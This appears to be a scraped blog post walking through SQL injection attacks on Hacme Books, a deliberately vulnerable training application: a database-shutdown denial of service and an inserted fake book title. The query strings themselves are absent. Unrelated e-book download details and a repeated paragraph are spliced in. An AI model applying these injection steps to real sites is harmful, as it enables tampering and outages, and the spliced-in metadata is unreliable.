Hacme Books 2. Great books. Foundstone Hacme Books v2. As a full-featured J2EE application, Hacme Books is representative of real-world J2EE scenarios and demonstrates the security problems that can potentially arise in these applications. In order to both raise general awareness and still challenge the more advanced developer, Hacme Books was built with several layers of vulnerabilities, from simple implementation issues to more complex design flaws.
|Published (Last):||19 August 2017|
|PDF File Size:||15.63 Mb|
|ePub File Size:||17.54 Mb|
|Price:||Free* [*Free Regsitration Required]|
This is the third in a series of five posts for the vulnerable web application Hacme Books. New posts for WebGoat will post every Monday. In here I will be discussing the Denial of Service attack.
I will be using SQL Injection as the basic attack techniques. The attacker had the information on how to attack the Hypersonic SQL prior to starting the attack Google is the best tool available to hackers by using extensive searches on the target system.
Most of the SQL Injection vulnerabilities are a result of concatenating the SQL statements including the user input taken using the application interface. The above code takes input from the user and processes the keywords into an SQL criteria via some method that iterates over the tokenized input. So the attacker can maliciously insert extra SQL statements.
A correct SQL statement code generated by the application would be like:. Now to make it an effective shutdown statement should be like:. Here is how I used this to shutdown the system and achieved a DoS attack.
Note: For this section you will need a valid user account to continue. Use the Signup link on the main page to create a new user. This time we will not force the system shutdown but just modify the data; or Data Tempering. I will try to add a book title on the website the book actually does not exist. This will cause a rather embarrassing situation for the website and online book store. To modify the data within a database table the attacker must know the database schema which means that structure of the database table and organization of the data within the tables.
To add a new title in the database when there is no such title available, here again I used the SQL injection but I had more detailed information about the database schema. Now we have to add a new title. Look at the feedback section, a user can leave the feedback for the title there; I used the Feedback input box to enter a SQL query to add a new title to the products table. It a typical insert query used in SQL, all we need is the name of fields and data type so that we can add the information without causing any errors during the query execution.
So the purpose of the attack was accomplished, we were able to add a title to the database of the book store. The newly added book does not even exist and has an embarrassing title. This will sure make people think whether they want to purchase a book from this site or not, because the integrity is compromised.
You are commenting using your WordPress. You are commenting using your Google account. You are commenting using your Twitter account. You are commenting using your Facebook account. Notify me of new comments via email. Notify me of new posts via email. Web App Pentesting. Skip to content. Home About Contact Us.
Join us next Monday for the fourth in the series on Hacme Books. Like this: Like Loading Bookmark the permalink. Leave a Reply Cancel reply Enter your comment here Fill in your details below or click an icon to log in:.
Email required Address never made public. Name required. Blog at WordPress. Post to Cancel.
HacmeBank & HacmeCasino in the Cloud | Free Windows Security Trainings
This is the third in a series of five posts for the vulnerable web application Hacme Books. New posts for WebGoat will post every Monday. In here I will be discussing the Denial of Service attack. I will be using SQL Injection as the basic attack techniques.